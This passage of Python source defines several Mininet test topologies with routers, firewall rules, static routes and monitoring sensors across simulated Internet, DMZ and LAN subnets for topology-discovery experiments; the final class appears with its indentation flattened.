    This topology simulates a network with one router.
    Three hosts belong to subnet 12.0.0.0/8, representing the internet.
    Three hosts belong to subnet 192.168.1.0/24, representing the DMZ.
    Three hosts belong to subnet 192.168.2.0/24, representing the LAN.
    Communication is possible among all subnets.
    """

    def __init__(self, *args, **params):
        '''
        :param sensor1: True if a sensor has to be placed in subnet 12.0.0.0/8
        :param sensor2: True if a sensor has to be placed in subnet 192.168.1.0/24
        :param sensor3: True if a sensor has to be placed in subnet 192.168.2.0/24
        '''
        # Fixed: use .get() so a missing flag behaves like an explicit None
        # instead of raising KeyError.  Only None/False disable a sensor;
        # any other value enables it (same truth table as before).
        self.sensor1 = params.get('sensor1') not in (None, False)
        self.sensor2 = params.get('sensor2') not in (None, False)
        self.sensor3 = params.get('sensor3') not in (None, False)
        self.swc = {}             # key: switch number, value: switch
        self.net_hosts = []
        self.active_sensors = []
        self.passive_sensors = []
        self.monitor_sensors = []
        self.interface_name = []
        self.alias = {}           # key: router/host name, value: list of its IP addresses
        self.sroutes = {}         # key: router/host/sensor id, value: list of static routes to set up
        super(NetworkTopo6, self).__init__()  # Topo.__init__ triggers build()

    def build(self, **_opts):
        # --- Internet subnet (12.0.0.0/8) behind router r1 ---
        r1IP1 = '12.10.5.1'
        self.router1 = self.addNode('r1', cls=LinuxRouter, ip=r1IP1 + '/8')
        self.alias['r1'] = [r1IP1]
        self.sroutes['r1'] = []
        self.swc[1] = self.addSwitch('s1')
        self.addLink(self.swc[1], self.router1, intfName2='r1-eth1', params2={'ip': r1IP1 + '/8'})
        self.net_hosts.append(self.addHost('h1', ip='12.10.5.2/8', defaultRoute=r1IP1 + '/8'))
        self.addLink('h1', self.swc[1])
        self.alias['h1'] = ['12.10.5.2']
        self.net_hosts.append(self.addHost('h2', ip='12.10.5.3/8', defaultRoute=r1IP1 + '/8'))
        self.addLink('h2', self.swc[1])
        self.alias['h2'] = ['12.10.5.3']
        self.net_hosts.append(self.addHost('h3', ip='12.10.5.4/8', defaultRoute=r1IP1 + '/8'))
        self.addLink('h3', self.swc[1])
        self.alias['h3'] = ['12.10.5.4']
        self.sroutes['h1'] = ['ip route add default via 12.10.5.1 dev h1-eth0']
        self.sroutes['h2'] = ['ip route add default via 12.10.5.1 dev h2-eth0']
        self.sroutes['h3'] = ['ip route add default via 12.10.5.1 dev h3-eth0']
        # --- DMZ subnet (192.168.1.0/24) ---
        r1IP2 = '192.168.1.1'
        self.alias['r1'].append(r1IP2)
        self.swc[2] = self.addSwitch('s2')
        self.addLink(self.swc[2], self.router1, intfName2='r1-eth2', params2={'ip': r1IP2 + '/24'})
        self.net_hosts.append(self.addHost('h5', ip='192.168.1.2/24', defaultRoute=r1IP2 + '/24'))
        self.addLink('h5', self.swc[2])
        self.alias['h5'] = ['192.168.1.2']
        self.net_hosts.append(self.addHost('h4', ip='192.168.1.3/24', defaultRoute=r1IP2 + '/24'))
        self.addLink('h4', self.swc[2])
        self.alias['h4'] = ['192.168.1.3']
        self.net_hosts.append(self.addHost('h6', ip='192.168.1.4/24', defaultRoute=r1IP2 + '/24'))
        self.addLink('h6', self.swc[2])
        self.alias['h6'] = ['192.168.1.4']
        self.sroutes['h4'] = ['ip route add default via 192.168.1.1 dev h4-eth0']
        self.sroutes['h5'] = ['ip route add default via 192.168.1.1 dev h5-eth0']
        self.sroutes['h6'] = ['ip route add default via 192.168.1.1 dev h6-eth0']
        # --- LAN subnet (192.168.2.0/24) ---
        r1IP3 = '192.168.2.1'
        self.alias['r1'].append(r1IP3)
        self.swc[3] = self.addSwitch('s3')
        # The first switch-router link MUST use the address given in the router definition.
        self.addLink(self.swc[3], self.router1, intfName2='r1-eth3', params2={'ip': r1IP3 + '/24'})
        self.net_hosts.append(self.addHost('h9', ip='192.168.2.2/24', defaultRoute=r1IP3 + '/24'))
        self.addLink('h9', self.swc[3])
        self.alias['h9'] = ['192.168.2.2']
        self.net_hosts.append(self.addHost('h7', ip='192.168.2.3/24', defaultRoute=r1IP3 + '/24'))
        self.addLink('h7', self.swc[3])
        self.alias['h7'] = ['192.168.2.3']
        self.net_hosts.append(self.addHost('h8', ip='192.168.2.4/24', defaultRoute=r1IP3 + '/24'))
        self.addLink('h8', self.swc[3])
        self.alias['h8'] = ['192.168.2.4']
        self.sroutes['h8'] = ['ip route add default via 192.168.2.1 dev h8-eth0']
        self.sroutes['h7'] = ['ip route add default via 192.168.2.1 dev h7-eth0']
        self.sroutes['h9'] = ['ip route add default via 192.168.2.1 dev h9-eth0']
        if self.sensor1: self.add_sensor_Internet()
        if self.sensor2: self.add_sensor_LAN(1)
        if self.sensor3: self.add_sensor_LAN(2)

    def add_sensor_LAN(self, i):
        """Attach an active and a monitor sensor to LAN/DMZ subnet 192.168.<i>.0/24."""
        asid = 'has' + str(i)
        msid = 'hms' + str(i)
        rIP = '192.168.' + str(i) + '.1'
        asIP = '192.168.' + str(i) + '.101'   # Active sensor IP
        msIP = '192.168.' + str(i) + '.103'   # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
        if i == 1:
            sensor = self.swc[2]
            intf = 's2-eth1'
        else:
            sensor = self.swc[3]
            intf = 's3-eth1'
        self.passive_sensors.append(sensor)
        self.interface_name.append(intf)
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
        self.addLink(asid, self.swc[i + 1])
        self.addLink(msid, self.swc[i + 1])
        # Every sensor address is aliased to the monitor sensor, because it is
        # the only one that can actively query the network.
        self.alias[msid] = [asIP]
        self.alias[msid].append(msIP)
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_sensor_Internet(self):
        """Attach an active and a monitor sensor to the 12.0.0.0/8 (Internet) subnet."""
        asid = 'hasI'
        msid = 'hmsI'
        rIP = '12.10.5.1'
        asIP = '12.10.5.101'   # Active sensor IP
        msIP = '12.10.5.103'   # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/8', defaultRoute=rIP))
        self.passive_sensors.append(self.swc[1])
        self.interface_name.append('s1-eth1')
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/8', defaultRoute=rIP))
        self.addLink(asid, self.swc[1])
        self.addLink(msid, self.swc[1])
        # Every sensor address is aliased to the monitor sensor, because it is
        # the only one that can actively query the network.
        self.alias[msid] = [asIP]
        self.alias[msid].append(msIP)
        self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth1')
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_static_routes(self, net):
        '''Add static routes to the router for subnets not directly visible'''
        for k in self.sroutes.keys():
            for r in self.sroutes[k]:
                net[k].cmd(r)

    def create_alias_file(self):
        '''Write the alias table to a file named "alias": one node per line.'''
        with open('alias', 'w') as f:
            for k in self.alias.keys():
                f.write(k + ' ')
                for ip in self.alias[k]:
                    f.write(ip + ' ')
                f.write('\n')
class NetworkTopo7(Topo):
    """
    This topology simulates a network with one firewall.
    Three hosts belong to subnet 12.0.0.0/8, representing the internet.
    Three hosts belong to subnet 192.168.1.0/24, representing the DMZ.
    Three hosts belong to subnet 192.168.2.0/24, representing the LAN.
    Communication is possible only inside the LAN or between Internet and DMZ.
    """

    def __init__(self, *args, **params):
        '''
        :param sensor1: True if a sensor has to be placed in subnet 12.0.0.0/8
        :param sensor2: True if a sensor has to be placed in subnet 192.168.1.0/24
        :param sensor3: True if a sensor has to be placed in subnet 192.168.2.0/24
        '''
        # Fixed: use .get() so a missing flag behaves like an explicit None
        # instead of raising KeyError.  Only None/False disable a sensor;
        # any other value enables it (same truth table as before).
        self.sensor1 = params.get('sensor1') not in (None, False)
        self.sensor2 = params.get('sensor2') not in (None, False)
        self.sensor3 = params.get('sensor3') not in (None, False)
        self.swc = {}             # key: switch number, value: switch
        self.net_hosts = []
        self.active_sensors = []
        self.passive_sensors = []
        self.monitor_sensors = []
        self.interface_name = []
        self.fw_rules = {}        # key: host name, value: list of firewall rules to apply
        self.alias = {}           # key: router/host name, value: list of its IP addresses
        self.sroutes = {}         # key: router/host/sensor id, value: list of static routes to set up
        super(NetworkTopo7, self).__init__()  # Topo.__init__ triggers build()

    def build(self, **_opts):
        # --- Internet subnet (12.0.0.0/8) behind router r1 ---
        r1IP1 = '12.10.5.1'
        self.router1 = self.addNode('r1', cls=LinuxRouter, ip=r1IP1 + '/8')
        self.alias['r1'] = [r1IP1]
        self.sroutes['r1'] = []
        self.swc[1] = self.addSwitch('s1')
        self.addLink(self.swc[1], self.router1, intfName2='r1-eth1', params2={'ip': r1IP1 + '/8'})
        self.net_hosts.append(self.addHost('h1', ip='12.10.5.2/8', defaultRoute=r1IP1 + '/8'))
        self.addLink('h1', self.swc[1])
        self.alias['h1'] = ['12.10.5.2']
        self.net_hosts.append(self.addHost('h2', ip='12.10.5.3/8', defaultRoute=r1IP1 + '/8'))
        self.addLink('h2', self.swc[1])
        self.alias['h2'] = ['12.10.5.3']
        self.net_hosts.append(self.addHost('h3', ip='12.10.5.4/8', defaultRoute=r1IP1 + '/8'))
        self.addLink('h3', self.swc[1])
        self.alias['h3'] = ['12.10.5.4']
        self.sroutes['h1'] = ['ip route add default via 12.10.5.1 dev h1-eth0']
        self.sroutes['h2'] = ['ip route add default via 12.10.5.1 dev h2-eth0']
        self.sroutes['h3'] = ['ip route add default via 12.10.5.1 dev h3-eth0']
        # --- DMZ subnet (192.168.1.0/24) ---
        r1IP2 = '192.168.1.1'
        self.alias['r1'].append(r1IP2)
        self.swc[2] = self.addSwitch('s2')
        self.addLink(self.swc[2], self.router1, intfName2='r1-eth2', params2={'ip': r1IP2 + '/24'})
        self.net_hosts.append(self.addHost('h5', ip='192.168.1.2/24', defaultRoute=r1IP2 + '/24'))
        self.addLink('h5', self.swc[2])
        self.alias['h5'] = ['192.168.1.2']
        self.net_hosts.append(self.addHost('h4', ip='192.168.1.3/24', defaultRoute=r1IP2 + '/24'))
        self.addLink('h4', self.swc[2])
        self.alias['h4'] = ['192.168.1.3']
        self.net_hosts.append(self.addHost('h6', ip='192.168.1.4/24', defaultRoute=r1IP2 + '/24'))
        self.addLink('h6', self.swc[2])
        self.alias['h6'] = ['192.168.1.4']
        self.sroutes['h4'] = ['ip route add default via 192.168.1.1 dev h4-eth0']
        self.sroutes['h5'] = ['ip route add default via 192.168.1.1 dev h5-eth0']
        self.sroutes['h6'] = ['ip route add default via 192.168.1.1 dev h6-eth0']
        # --- LAN subnet (192.168.2.0/24) ---
        r1IP3 = '192.168.2.1'
        self.alias['r1'].append(r1IP3)
        self.swc[3] = self.addSwitch('s3')
        # The first switch-router link MUST use the address given in the router definition.
        self.addLink(self.swc[3], self.router1, intfName2='r1-eth3', params2={'ip': r1IP3 + '/24'})
        self.net_hosts.append(self.addHost('h9', ip='192.168.2.2/24', defaultRoute=r1IP3 + '/24'))
        self.addLink('h9', self.swc[3])
        self.alias['h9'] = ['192.168.2.2']
        self.net_hosts.append(self.addHost('h7', ip='192.168.2.3/24', defaultRoute=r1IP3 + '/24'))
        self.addLink('h7', self.swc[3])
        self.alias['h7'] = ['192.168.2.3']
        self.net_hosts.append(self.addHost('h8', ip='192.168.2.4/24', defaultRoute=r1IP3 + '/24'))
        self.addLink('h8', self.swc[3])
        self.alias['h8'] = ['192.168.2.4']
        self.sroutes['h8'] = ['ip route add default via 192.168.2.1 dev h8-eth0']
        self.sroutes['h7'] = ['ip route add default via 192.168.2.1 dev h7-eth0']
        self.sroutes['h9'] = ['ip route add default via 192.168.2.1 dev h9-eth0']
        # Default-deny forwarding; only Internet <-> DMZ traffic is allowed,
        # which is what makes r1 act as a firewall in this topology.
        self.fw_rules['r1'] = ['iptables -P FORWARD DROP']
        self.fw_rules['r1'].append('iptables -A FORWARD -i r1-eth1 -s 12.0.0.0/8 -o r1-eth2 -d 192.168.1.0/24 -j ACCEPT')
        self.fw_rules['r1'].append('iptables -A FORWARD -i r1-eth2 -s 192.168.1.0/24 -o r1-eth1 -d 12.0.0.0/8 -j ACCEPT')
        if self.sensor1: self.add_sensor_Internet()
        if self.sensor2: self.add_sensor_LAN(1)
        if self.sensor3: self.add_sensor_LAN(2)

    def add_sensor_LAN(self, i):
        """Attach an active and a monitor sensor to LAN/DMZ subnet 192.168.<i>.0/24."""
        asid = 'has' + str(i)
        msid = 'hms' + str(i)
        rIP = '192.168.' + str(i) + '.1'
        asIP = '192.168.' + str(i) + '.101'   # Active sensor IP
        msIP = '192.168.' + str(i) + '.103'   # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
        if i == 1:
            sensor = self.swc[2]
            intf = 's2-eth1'
        else:
            sensor = self.swc[3]
            intf = 's3-eth1'
        self.passive_sensors.append(sensor)
        self.interface_name.append(intf)
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
        self.addLink(asid, self.swc[i + 1])
        self.addLink(msid, self.swc[i + 1])
        # Every sensor address is aliased to the monitor sensor, because it is
        # the only one that can actively query the network.
        self.alias[msid] = [asIP]
        self.alias[msid].append(msIP)
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_sensor_Internet(self):
        """Attach an active and a monitor sensor to the 12.0.0.0/8 (Internet) subnet."""
        asid = 'hasI'
        msid = 'hmsI'
        rIP = '12.10.5.1'
        asIP = '12.10.5.101'   # Active sensor IP
        msIP = '12.10.5.103'   # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/8', defaultRoute=rIP))
        self.passive_sensors.append(self.swc[1])
        self.interface_name.append('s1-eth1')
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/8', defaultRoute=rIP))
        self.addLink(asid, self.swc[1])
        self.addLink(msid, self.swc[1])
        # Every sensor address is aliased to the monitor sensor, because it is
        # the only one that can actively query the network.
        self.alias[msid] = [asIP]
        self.alias[msid].append(msIP)
        self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth1')
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_static_routes(self, net):
        '''Add static routes to the router for subnets not directly visible'''
        for k in self.sroutes.keys():
            for r in self.sroutes[k]:
                net[k].cmd(r)

    def create_alias_file(self):
        '''Write the alias table to a file named "alias": one node per line.'''
        with open('alias', 'w') as f:
            for k in self.alias.keys():
                f.write(k + ' ')
                for ip in self.alias[k]:
                    f.write(ip + ' ')
                f.write('\n')

    def add_firewall_rules(self, net):
        '''Add firewall rules'''
        for k in self.fw_rules.keys():
            for r in self.fw_rules[k]:
                net[k].cmd(r)
class NetworkTopo8(Topo):
    """
    This topology simulates a network with three routers.
    Two hosts belong to subnet 12.0.0.0/8, representing the internet.
    Two hosts belong to subnet 192.168.1.0/24, representing the DMZ.
    Two hosts belong to subnet 192.168.2.0/24, representing LAN 1.
    Two hosts belong to subnet 192.168.3.0/24, representing LAN 2.
    Router1, the one that connects the three subnets, is anonymous.
    """

    def __init__(self, *args, **params):
        '''
        :param sensor1: True if a sensor has to be placed in subnet 12.0.0.0/8
        :param sensor2: True if a sensor has to be placed in subnet 192.168.1.0/24
        :param sensor3: True if a sensor has to be placed in subnet 192.168.2.0/24
        :param sensor4: True if a sensor has to be placed in subnet 192.168.3.0/24
        '''
        # Fixed: use .get() so a missing flag behaves like an explicit None
        # instead of raising KeyError.  Only None/False disable a sensor;
        # any other value enables it (same truth table as before).
        self.sensor1 = params.get('sensor1') not in (None, False)
        self.sensor2 = params.get('sensor2') not in (None, False)
        self.sensor3 = params.get('sensor3') not in (None, False)
        self.sensor4 = params.get('sensor4') not in (None, False)
        self.swc = {}             # key: switch number, value: switch
        self.net_hosts = []
        self.active_sensors = []
        self.passive_sensors = []
        self.monitor_sensors = []
        self.interface_name = []
        self.alias = {}           # key: router/host name, value: list of its IP addresses
        self.sroutes = {}         # key: router/host/sensor id, value: list of static routes to set up
        super(NetworkTopo8, self).__init__()  # Topo.__init__ triggers build()

    def build(self, **_opts):
        # --- Internet subnet (12.0.0.0/8) behind router r1 ---
        r1IP1 = '12.10.5.1'
        self.router1 = self.addNode('r1', cls=LinuxRouter, ip=r1IP1 + '/8')
        self.alias['r1'] = [r1IP1]
        self.sroutes['r1'] = []
        self.swc[1] = self.addSwitch('s1')
        self.addLink(self.swc[1], self.router1, intfName2='r1-eth1', params2={'ip': r1IP1 + '/8'})
        self.net_hosts.append(self.addHost('h1', ip='12.10.5.2/8', defaultRoute=r1IP1 + '/8'))
        self.addLink('h1', self.swc[1])
        self.alias['h1'] = ['12.10.5.2']
        self.net_hosts.append(self.addHost('h2', ip='12.10.5.3/8', defaultRoute=r1IP1 + '/8'))
        self.addLink('h2', self.swc[1])
        self.alias['h2'] = ['12.10.5.3']
        self.sroutes['r1'].append('ip route add 12.10.5.2/8 via 12.10.5.2 dev r1-eth1')
        self.sroutes['r1'].append('ip route add 12.10.5.3/8 via 12.10.5.3 dev r1-eth1')
        self.sroutes['h1'] = ['ip route add default via 12.10.5.1 dev h1-eth0']
        self.sroutes['h2'] = ['ip route add default via 12.10.5.1 dev h2-eth0']
        # --- DMZ (192.168.1.0/24) behind router r2, linked to r1 via 192.168.4.0/24 ---
        r1IP2 = '192.168.4.1'
        r2IP1 = '192.168.4.2'
        r2IP2 = '192.168.1.1'
        # TODO: the router's default address must always match the address of the
        # same class as the hosts attached to it (e.g. r2IP1 does not work here!)
        self.router2 = self.addNode('r2', cls=LinuxRouter, ip=r2IP1)  # r2IP2
        self.alias['r2'] = []
        self.alias['r1'].append(r1IP2)
        self.alias['r2'].append(r2IP1)
        self.alias['r2'].append(r2IP2)
        self.sroutes['r2'] = []
        self.swc[5] = self.addSwitch('s5')
        self.addLink(self.swc[5], self.router2, intfName2='r2-eth1', params2={'ip': r2IP1 + '/24'})
        self.addLink(self.swc[5], self.router1, intfName2='r1-eth2', params2={'ip': r1IP2 + '/24'})
        self.swc[2] = self.addSwitch('s2')
        self.addLink(self.swc[2], self.router2, intfName2='r2-eth2', params2={'ip': r2IP2 + '/24'})
        self.net_hosts.append(self.addHost('h3', ip='192.168.1.2/24', defaultRoute=r2IP2 + '/24'))
        self.addLink('h3', self.swc[2])
        self.alias['h3'] = ['192.168.1.2']
        self.net_hosts.append(self.addHost('h4', ip='192.168.1.3/24', defaultRoute=r2IP2 + '/24'))
        self.addLink('h4', self.swc[2])
        self.alias['h4'] = ['192.168.1.3']
        self.sroutes['h3'] = ['ip route add default via 192.168.1.1 dev h3-eth0']
        self.sroutes['h4'] = ['ip route add default via 192.168.1.1 dev h4-eth0']
        self.sroutes['r1'].append('ip route add 192.168.1.0/24 via 192.168.4.2 dev r1-eth2')
        self.sroutes['r2'].append('ip route add 192.168.2.0/24 via 192.168.4.1 dev r2-eth1')
        self.sroutes['r2'].append('ip route add 192.168.3.0/24 via 192.168.4.1 dev r2-eth1')
        self.sroutes['r2'].append('ip route add 192.168.5.0/24 via 192.168.4.1 dev r2-eth1')
        self.sroutes['r2'].append('ip route add 12.0.0.0/8 via 192.168.4.1 dev r2-eth1')
        # --- LAN 1 (192.168.2.0/24) and LAN 2 (192.168.3.0/24) behind router r3 ---
        r1IP3 = '192.168.5.1'
        r3IP1 = '192.168.5.2'
        r3IP2 = '192.168.2.1'
        r3IP3 = '192.168.3.1'
        self.router3 = self.addNode('r3', cls=LinuxRouter, ip=r3IP1)
        self.alias['r3'] = []
        self.alias['r1'].append(r1IP3)
        self.alias['r3'].append(r3IP1)
        self.alias['r3'].append(r3IP2)
        self.alias['r3'].append(r3IP3)
        self.sroutes['r3'] = []
        self.swc[6] = self.addSwitch('s6')
        # The first switch-router link MUST use the address given in the router definition.
        self.addLink(self.swc[6], self.router3, intfName2='r3-eth1', params2={'ip': r3IP1 + '/24'})
        self.addLink(self.swc[6], self.router1, intfName2='r1-eth3', params2={'ip': r1IP3 + '/24'})
        self.swc[3] = self.addSwitch('s3')
        self.addLink(self.swc[3], self.router3, intfName2='r3-eth2', params2={'ip': r3IP2 + '/24'})
        self.net_hosts.append(self.addHost('h5', ip='192.168.2.2/24', defaultRoute=r3IP2 + '/24'))
        self.addLink('h5', self.swc[3])
        self.alias['h5'] = ['192.168.2.2']
        self.net_hosts.append(self.addHost('h6', ip='192.168.2.3/24', defaultRoute=r3IP2 + '/24'))
        self.addLink('h6', self.swc[3])
        self.alias['h6'] = ['192.168.2.3']
        self.sroutes['h5'] = ['ip route add default via 192.168.2.1 dev h5-eth0']
        self.sroutes['h6'] = ['ip route add default via 192.168.2.1 dev h6-eth0']
        self.sroutes['r1'].append('ip route add 192.168.2.0/24 via 192.168.5.2 dev r1-eth3')
        self.sroutes['r1'].append('ip route add 192.168.3.0/24 via 192.168.5.2 dev r1-eth3')
        self.sroutes['r3'].append('ip route add 192.168.1.0/24 via 192.168.5.1 dev r3-eth1')
        self.sroutes['r3'].append('ip route add 192.168.4.0/24 via 192.168.5.1 dev r3-eth1')
        self.sroutes['r3'].append('ip route add 12.0.0.0/8 via 192.168.5.1 dev r3-eth1')
        self.sroutes['r3'].append('ip route add 12.10.5.2/8 via 192.168.5.1 dev r3-eth1')
        self.swc[4] = self.addSwitch('s4')
        self.addLink(self.swc[4], self.router3, intfName2='r3-eth3', params2={'ip': r3IP3 + '/24'})
        self.net_hosts.append(self.addHost('h7', ip='192.168.3.2/24', defaultRoute=r3IP3 + '/24'))
        self.addLink('h7', self.swc[4])
        self.alias['h7'] = ['192.168.3.2']
        self.net_hosts.append(self.addHost('h8', ip='192.168.3.3/24', defaultRoute=r3IP3 + '/24'))
        self.addLink('h8', self.swc[4])
        self.alias['h8'] = ['192.168.3.3']
        self.sroutes['h7'] = ['ip route add default via 192.168.3.1 dev h7-eth0']
        self.sroutes['h8'] = ['ip route add default via 192.168.3.1 dev h8-eth0']
        if self.sensor1: self.add_sensor_Internet()
        if self.sensor2: self.add_sensor_LAN(1)
        if self.sensor3: self.add_sensor_LAN(2)
        if self.sensor4: self.add_sensor_LAN(3)

    def add_sensor_LAN(self, i):
        """Attach an active and a monitor sensor to LAN/DMZ subnet 192.168.<i>.0/24."""
        asid = 'has' + str(i)
        msid = 'hms' + str(i)
        rIP = '192.168.' + str(i) + '.1'
        asIP = '192.168.' + str(i) + '.101'   # Active sensor IP
        msIP = '192.168.' + str(i) + '.103'   # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
        if i == 1:
            sensor = self.swc[2]
            intf = 's2-eth1'
        elif i == 2:
            sensor = self.swc[3]
            intf = 's3-eth1'
        else:
            sensor = self.swc[4]
            intf = 's4-eth1'
        self.passive_sensors.append(sensor)
        self.interface_name.append(intf)
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
        self.addLink(asid, self.swc[i + 1])
        self.addLink(msid, self.swc[i + 1])
        # Every sensor address is aliased to the monitor sensor, because it is
        # the only one that can actively query the network.
        self.alias[msid] = [asIP]
        self.alias[msid].append(msIP)
        # Subnet 1 hangs off r2; subnets 2 and 3 hang off r3 (r3-eth2 / r3-eth3).
        if i == 1:
            self.sroutes['r2'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r2-eth2')
        else:
            self.sroutes['r3'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r3-eth' + str(i))
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_sensor_Internet(self):
        """Attach an active and a monitor sensor to the 12.0.0.0/8 (Internet) subnet."""
        asid = 'hasI'
        msid = 'hmsI'
        rIP = '12.10.5.1'
        asIP = '12.10.5.101'   # Active sensor IP
        msIP = '12.10.5.103'   # Monitor sensor IP (the one that runs iTop)
        self.active_sensors.append(self.addHost(asid, ip=asIP + '/8', defaultRoute=rIP))
        self.passive_sensors.append(self.swc[1])
        self.interface_name.append('s1-eth1')
        self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/8', defaultRoute=rIP))
        self.addLink(asid, self.swc[1])
        self.addLink(msid, self.swc[1])
        # Every sensor address is aliased to the monitor sensor, because it is
        # the only one that can actively query the network.
        self.alias[msid] = [asIP]
        self.alias[msid].append(msIP)
        self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth1')
        self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
        self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']

    def add_static_routes(self, net):
        '''Add static routes to the router for subnets not directly visible'''
        for k in self.sroutes.keys():
            for r in self.sroutes[k]:
                net[k].cmd(r)

    def create_alias_file(self):
        '''Write the alias table to a file named "alias": one node per line.'''
        with open('alias', 'w') as f:
            for k in self.alias.keys():
                f.write(k + ' ')
                for ip in self.alias[k]:
                    f.write(ip + ' ')
                f.write('\n')

    def add_firewall_rules(self, net):
        '''Add firewall rules to make router r1 anonymous'''
        net['r1'].cmd('iptables -P OUTPUT DROP')
class NetworkTopo9( Topo ):
"""
This topology simulates a network with three routers.
Two hosts belong to subnet 12.0.0.0/8, representing the internet.
Two hosts belong to subnet 192.168.1.0/24, representing the DMZ.
Two hosts belong to subnet 192.168.2.0/24, representing LAN 1.
Two hosts belong to subnet 192.168.3.0/24, representing LAN 2.
Router1, the one that connects the three subnets, is blocking.
"""
def __init__(self, *args, **params):
'''
:param sensor1: True if a sensor has to be placed in subnet 12.0.0.0/8
:param sensor2: True if a sensor has to be placed in subnet 192.168.1.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.2.0/24
:param sensor2: True if a sensor has to be placed in subnet 192.168.3.0/24
'''
self.sensor1 = False if (params['sensor1'] is None or params['sensor1'] is False) else True
self.sensor2 = False if (params['sensor2'] is None or params['sensor2'] is False) else True
self.sensor3 = False if (params['sensor3'] is None or params['sensor3'] is False) else True
self.sensor4 = False if (params['sensor4'] is None or params['sensor4'] is False) else True
self.swc = {} # Key: Number of switch, value: switch
self.net_hosts = []
self.active_sensors = []
self.passive_sensors = []
self.monitor_sensors = []
self.interface_name = []
self.alias = {} # Dictionary st: key = router/host name, value = list of IP addresses of the router/host
self.sroutes = {} # Key: Router/Host/sensor id, value = list of static routes to be setup
super(NetworkTopo9, self).__init__()
def build( self, **_opts ):
# Connect router r1 to Internet Hosts
r1IP1 = '12.10.5.1'
self.router1 = self.addNode( 'r1', cls=LinuxRouter, ip=r1IP1+'/8' )
self.alias['r1'] = []
self.alias['r1'].append(r1IP1)
self.sroutes['r1'] = []
self.swc[1] = self.addSwitch('s1')
self.addLink(self.swc[1], self.router1, intfName2='r1-eth1', params2={'ip': r1IP1+'/8'})
self.net_hosts.append(self.addHost('h1', ip='12.10.5.2/8', defaultRoute=r1IP1+'/8'))
self.addLink('h1', self.swc[1])
self.alias['h1'] = ['12.10.5.2']
self.net_hosts.append(self.addHost('h2', ip='12.10.5.3/8', defaultRoute=r1IP1+'/8'))
self.addLink('h2', self.swc[1])
self.alias['h2'] = ['12.10.5.3']
self.sroutes['r1'].append('ip route add 12.10.5.2/8 via 12.10.5.2 dev r1-eth1')
self.sroutes['r1'].append('ip route add 12.10.5.3/8 via 12.10.5.3 dev r1-eth1')
self.sroutes['h1'] = ['ip route add default via 12.10.5.1 dev h1-eth0']
self.sroutes['h2'] = ['ip route add default via 12.10.5.1 dev h2-eth0']
# Connect the DMZ
r1IP2 = '192.168.4.1'
r2IP1 = '192.168.4.2'
r2IP2 = '192.168.1.1'
# TODO l' indirizzo di default del router deve corrispondere sempre al' indirizzo della stessa classe degli host che gli sono attaccati (es: r2IP1 non funziona qui!)
self.router2 = self.addNode('r2', cls=LinuxRouter, ip=r2IP1) #r2IP2
self.alias['r2'] = []
self.alias['r1'].append(r1IP2)
self.alias['r2'].append(r2IP1)
self.alias['r2'].append(r2IP2)
self.sroutes['r2'] = []
self.swc[5] = self.addSwitch('s5')
self.addLink(self.swc[5], self.router2, intfName2='r2-eth1', params2={'ip': r2IP1+'/24'})
self.addLink(self.swc[5], self.router1, intfName2='r1-eth2', params2={'ip': r1IP2+'/24'})
self.swc[2] = self.addSwitch('s2')
self.addLink(self.swc[2], self.router2, intfName2='r2-eth2', params2={'ip': r2IP2+'/24'})
self.net_hosts.append(self.addHost('h3', ip='192.168.1.2/24', defaultRoute=r2IP2+'/24'))
self.addLink('h3', self.swc[2])
self.alias['h3'] = ['192.168.1.2']
self.net_hosts.append(self.addHost('h4', ip='192.168.1.3/24', defaultRoute=r2IP2+'/24'))
self.addLink('h4', self.swc[2])
self.alias['h4'] = ['192.168.1.3']
self.sroutes['h3'] = ['ip route add default via 192.168.1.1 dev h3-eth0']
self.sroutes['h4'] = ['ip route add default via 192.168.1.1 dev h4-eth0']
self.sroutes['r1'].append('ip route add 192.168.1.0/24 via 192.168.4.2 dev r1-eth2')
self.sroutes['r2'].append('ip route add 192.168.2.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 192.168.3.0/24 via 192.168.4.1 dev r2-eth1')
self.sroutes['r2'].append('ip route add 192.168.5.0/24 via 192.168.4.1 dev r2-eth1')
